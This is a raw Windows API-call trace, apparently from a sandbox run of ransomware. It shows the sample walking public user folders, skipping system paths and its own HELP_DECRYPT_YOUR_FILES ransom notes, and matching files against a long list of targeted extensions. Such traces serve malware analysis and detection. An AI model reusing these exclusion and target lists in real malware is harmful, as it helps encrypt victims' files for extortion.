	[0180.868] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="application data") returned 0x0
	[0180.868] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.868] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="winnt") returned 0x0
	[0180.868] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.868] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="tmp") returned 0x0
	[0180.868] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.868] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="cache") returned 0x0
	[0180.868] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.869] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.869] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.869] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="webcache") returned 0x0
	[0180.869] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.869] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0180.869] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.869] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0180.870] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.870] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="packages") returned 0x0
	[0180.870] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.870] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="cookies") returned 0x0
	[0180.870] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.870] StrStrW (lpFirst="c:\\users\\public\\pictures\\*.*", lpSrch="programdata") returned 0x0
	[0180.870] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.871] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.871] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8539432d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.871] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.871] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.871] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8539432d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8555df40, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.871] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8536e2dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85537d7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.871] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8536e2dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8536e2dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85537d7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.871] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0180.871] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0180.872] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0180.872] lstrcmpW (lpString1="Videos", lpString2="..") returned 1
	[0180.872] lstrcmpW (lpString1="Videos", lpString2=".") returned 1
	[0180.872] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.872] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.872] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos"
	[0180.872] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos"
	[0180.873] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\"
	[0180.873] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\"
	[0180.873] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Videos\\*.*") returned="C:\\Users\\Public\\Videos\\*.*"
	[0180.873] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*" (normalized: "c:\\users\\public\\videos\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x853ba621, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.873] lstrlenW (lpString="C:\\Users\\Public\\Videos\\*.*") returned 26
	[0180.873] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.874] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Videos\\*.*", cchLength=0x1a | out: lpsz="c:\\users\\public\\videos\\*.*") returned 0x1a
	[0180.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.874] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="windows") returned 0x0
	[0180.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.874] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="boot") returned 0x0
	[0180.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.875] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="system volume information") returned 0x0
	[0180.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.875] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.875] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="temp") returned 0x0
	[0180.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.880] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="program files") returned 0x0
	[0180.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.880] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.880] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="appdata") returned 0x0
	[0180.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.881] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="application data") returned 0x0
	[0180.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.881] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="winnt") returned 0x0
	[0180.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.881] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="tmp") returned 0x0
	[0180.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.881] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="cache") returned 0x0
	[0180.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.882] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.882] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="webcache") returned 0x0
	[0180.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.882] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="inetcache") returned 0x0
	[0180.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.883] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="nvidia") returned 0x0
	[0180.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.883] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="packages") returned 0x0
	[0180.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.883] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="cookies") returned 0x0
	[0180.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.883] StrStrW (lpFirst="c:\\users\\public\\videos\\*.*", lpSrch="programdata") returned 0x0
	[0180.884] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x853ba621, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.884] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.884] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.884] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.884] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\"
	[0180.884] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Videos\\desktop.ini") returned="C:\\Users\\Public\\Videos\\desktop.ini"
	[0180.884] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34
	[0180.884] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.884] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Videos\\desktop.ini", cchLength=0x22 | out: lpsz="c:\\users\\public\\videos\\desktop.ini") returned 0x22
	[0180.885] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.885] StrStrW (lpFirst="c:\\users\\public\\videos\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.885] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\videos\\desktop.ini" | out: lpString1="c:\\users\\public\\videos\\desktop.ini") returned="c:\\users\\public\\videos\\desktop.ini"
	[0180.885] lstrlenW (lpString="c:\\users\\public\\videos\\desktop.ini") returned 34
	[0180.885] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.885] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.886] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.886] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.886] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0180.886] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x853ba621, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x853ba621, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x853e0902, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.886] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0180.886] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0180.886] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\"
	[0180.887] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0180.887] lstrlenW (lpString="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML") returned 51
	[0180.887] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.887] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x33 | out: lpsz="c:\\users\\public\\videos\\help_decrypt_your_files.html") returned 0x33
	[0180.887] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.887] StrStrW (lpFirst="c:\\users\\public\\videos\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0180.887] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8539432d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x853ba621, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.887] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0180.887] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0180.888] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\"
	[0180.888] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0180.888] lstrlenW (lpString="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 50
	[0180.888] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.888] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Videos\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x32 | out: lpsz="c:\\users\\public\\videos\\help_decrypt_your_files.txt") returned 0x32
	[0180.888] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.888] StrStrW (lpFirst="c:\\users\\public\\videos\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0180.888] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8539432d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8539432d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x853ba621, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0180.889] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.889] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.890] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos"
	[0180.890] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Videos\\*.*") returned="C:\\Users\\Public\\Videos\\*.*"
	[0180.890] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.890] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
